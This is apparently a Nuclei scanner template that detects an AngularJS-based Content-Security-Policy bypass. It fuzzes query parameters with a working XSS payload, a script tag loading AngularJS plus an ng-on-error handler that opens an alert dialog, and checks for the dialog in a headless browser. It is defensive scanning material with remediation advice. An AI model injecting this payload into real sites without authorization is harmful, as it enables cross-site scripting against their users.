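# Nuclei DAST template: reports a page when (1) its response headers mention a
# Content-Security-Policy together with "angularjs.org" and (2) a query-parameter
# injection that loads AngularJS from that host opens a JavaScript dialog in a
# headless browser. A hit means a reflected injection exists AND the policy does
# not stop it, because the allowlisted host serves a script-gadget library.
#
# Remediation for a confirmed finding: fix the reflected injection with
# context-aware output encoding, and drop hosts that serve AngularJS from
# script-src in favour of nonce- or hash-based policies.
id: angularjs-code-csp-bypass

info:
  name: Content-Security-Policy Bypass - AngularJS Code
  author: renniepak,DhiyaneshDK
  severity: medium
  reference:
    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
  metadata:
    verified: true
  tags: xss,csp-bypass,angularjs-code

# The headless step runs only when the HTTP pre-check below has matched.
flow: http(1) && headless(1)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      # Coarse pre-filter over all response headers, not a CSP parser:
      # "Content-Security-Policy" is also a substring of the
      # Content-Security-Policy-Report-Only header name, and "angularjs.org" may
      # appear in any header or directive. When triaging a hit, confirm that the
      # enforcing policy's script-src really allowlists the AngularJS host.
      - type: word
        part: header
        words:
          - "Content-Security-Policy"
          - "angularjs.org"
        condition: and
        # internal: gates the flow only; this matcher never produces a result.
        internal: true

headless:
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}"

      # Records under angularjs_code_csp_xss whether a dialog opened within 5s.
      - action: waitdialog
        name: angularjs_code_csp_xss
        args:
          max-duration: 5s

    payloads:
      injection:
        - '<script src="https://code.angularjs.org/1.8.2/angular.min.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'

    # Replaces the value of one query parameter at a time with the URL-encoded
    # payload; targets without query parameters give this step nothing to test.
    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{url_encode(injection)}}"

    matchers:
      - type: dsl
        dsl:
          - "angularjs_code_csp_xss == true"
# NOTE(review): the digest below signs the upstream template text; any edit,
# presumably including added comments, invalidates it. Re-sign before relying
# on signature verification.
# digest: 4a0a00473045022100f71008e67eeaa6f86966ee34f89e3a384a576b369bf705c1a2ab47e6ee465e96022074876b521ae61f16a15c4a6cf5c3134ef22451c5ee35f263e9096a89d3900288:922c64590222798bb761d5b6d8e72950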